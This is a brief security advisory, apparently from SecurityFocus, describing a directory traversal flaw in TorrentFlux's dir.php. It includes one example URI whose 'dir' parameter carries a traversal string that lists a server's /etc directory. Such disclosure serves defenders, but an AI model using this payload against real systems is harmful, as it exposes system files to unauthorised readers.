TorrentFlux Dir.PHP Directory Traversal Vulnerability

Attackers can exploit this issue via a web client.

An example URI that returns the directory listings for '/etc' is as follows:

http://www.example.com/torrentfluxroot/dir.php?dir=\.\./\.\./\.\./etc/


 

Privacy Statement
Copyright 2010, SecurityFocus